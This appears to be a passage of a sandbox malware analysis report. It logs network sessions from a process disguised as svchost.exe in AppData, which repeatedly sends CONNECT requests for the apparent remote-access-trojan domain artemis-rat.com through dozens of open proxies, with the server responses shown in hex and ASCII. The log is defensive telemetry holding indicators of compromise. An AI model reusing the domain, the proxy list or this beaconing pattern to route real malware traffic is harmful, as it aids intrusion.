Mar 9, 2024 13:14:31.200668097 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.040719032 CET	303	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2656	192.168.2.5	58652	94.177.106.178	2324	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.200680017 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2657	192.168.2.5	58643	194.182.178.90	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.200685024 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.529592037 CET	28	IN	HTTP/1.1 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2658	192.168.2.5	58607	79.143.187.58	18990	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.200748920 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2659	192.168.2.5	58648	115.239.234.43	7302	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.200912952 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.553297997 CET	90	IN	HTTP/1.1 200 OK Content-Type: application/json Connection: close Content-Length: 55

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2660	192.168.2.5	58731	163.15.183.33	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.206440926 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.880487919 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.816036940 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.658622980 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.378413916 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2661	192.168.2.5	55702	103.90.227.244	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.206723928 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2662	192.168.2.5	58681	94.30.152.172	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.219338894 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2663	192.168.2.5	58825	104.20.198.49	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.219737053 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.375391006 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2664	192.168.2.5	58783	142.54.228.193	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.219995022 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.880029917 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2665	192.168.2.5	58637	202.139.198.15	3030	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.220038891 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2666	192.168.2.5	58684	167.172.86.46	10471	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.220163107 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2667	192.168.2.5	57714	190.110.226.162	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.220314026 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.380093098 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.474405050 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2668	192.168.2.5	58630	93.90.212.2	4153	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.220417976 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2669	192.168.2.5	58644	138.36.150.16	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.220583916 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2670	192.168.2.5	58711	177.12.118.160	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.220890045 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.546093941 CET	340	IN	HTTP/1.1 400 Bad Request Server: nginx/1.12.2 Date: Sat, 09 Mar 2024 12:14:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2671	192.168.2.5	58698	120.79.101.0	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.221362114 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.560214996 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2672	192.168.2.5	58640	222.255.238.159	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.223629951 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.592251062 CET	481	IN	HTTP/1.1 302 Found Date: Sat, 09 Mar 2024 12:14:31 GMT Server: Apache/2.4.41 (Ubuntu) Location: https://ktxcomay.com.vn Content-Length: 289 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 74 78 63 6f 6d 61 79 2e 63 6f 6d 2e 76 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://ktxcomay.com.vn">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2673	192.168.2.5	55672	103.172.42.121	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.229176998 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.349014997 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.970308065 CET	19	IN	HTTP/1.1 200 OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2674	192.168.2.5	58673	182.106.220.252	9091	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.231522083 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.593689919 CET	325	IN	HTTP/1.1 400 Bad Request Server: nginx/1.12.1 Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2675	192.168.2.5	58697	60.190.68.154	7302	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.289218903 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.667999029 CET	90	IN	HTTP/1.1 200 OK Content-Type: application/json Connection: close Content-Length: 55

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2676	192.168.2.5	58655	103.49.202.252	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.291812897 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2677	192.168.2.5	57790	52.151.210.204	9002	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.292388916 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2678	192.168.2.5	58833	65.49.38.202	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.295909882 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2679	192.168.2.5	58744	84.39.112.144	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.296550035 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2680	192.168.2.5	58748	8.218.231.62	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.296745062 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2681	192.168.2.5	58848	104.25.58.39	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.307100058 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.461679935 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2682	192.168.2.5	58849	185.238.228.96	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.307296991 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
